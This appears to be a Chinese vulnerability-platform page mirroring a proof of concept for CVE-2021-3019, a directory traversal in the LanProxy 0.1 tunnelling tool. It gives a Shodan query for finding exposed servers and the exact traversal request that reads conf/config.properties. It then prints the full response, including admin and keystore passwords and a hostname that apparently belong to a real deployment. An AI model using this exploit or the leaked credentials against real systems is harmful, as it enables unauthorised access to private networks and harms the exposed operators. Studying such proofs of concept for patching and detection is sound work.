漏洞平台

POC详情： ba71a07aaf23e75deff40bac3e32269d88cf57e4

来源

https://github.com/murataydemir/CVE-2021-3019

关联漏洞

标题： Ffay Lanproxy 路径遍历漏洞 (CVE-2021-3019)
描述：Ffay Lanproxy是Ffay个人开发者的一个可将局域网内服务代理到公网的内网穿透工具。 ffay lanproxy 0.1 存在路径遍历漏洞，该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

描述

[CVE-2021-3019] LanProxy Directory Traversal

介绍

<b>[CVE-2021-3019] LanProxy Directory Traversal</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

Lanproxy is an intranet penetration tool that proxies LAN personal computers and servers to the public network.
It supports tcp traffic forwarding and supports any tcp upper layer protocol (access to intranet websites, local payment interface debugging, ssh access, 
remote desktop, etc.) LanProxy version 0.1 is vulnerable to path traversal vulnerability that may leads to read `conf/config.properties` to obtain credentials for intranet connection.

Shodan search: `"Server: LPS-0.1"`<br>
<br>Reading configuration file

```
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```

```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900

#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#这个配置可以忽略
server.ssl.needsClientAuth=false

#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0

#后台控制面板端口（安全组放行端口）
config.server.port=8090

#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
```

![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2000.57.50.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.13.png)
![Image of PoC](https://github.com/murataydemir/CVE-2021-3019/blob/main/Screen%20Shot%202021-03-03%20at%2001.01.23.png)

文件快照


 [4.0K]  /data/pocs/ba71a07aaf23e75deff40bac3e32269d88cf57e4
├── [2.1K]  README.md
├── [263K]  Screen Shot 2021-03-03 at 00.57.50.png
├── [233K]  Screen Shot 2021-03-03 at 01.01.13.png
└── [232K]  Screen Shot 2021-03-03 at 01.01.23.png

0 directories, 4 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。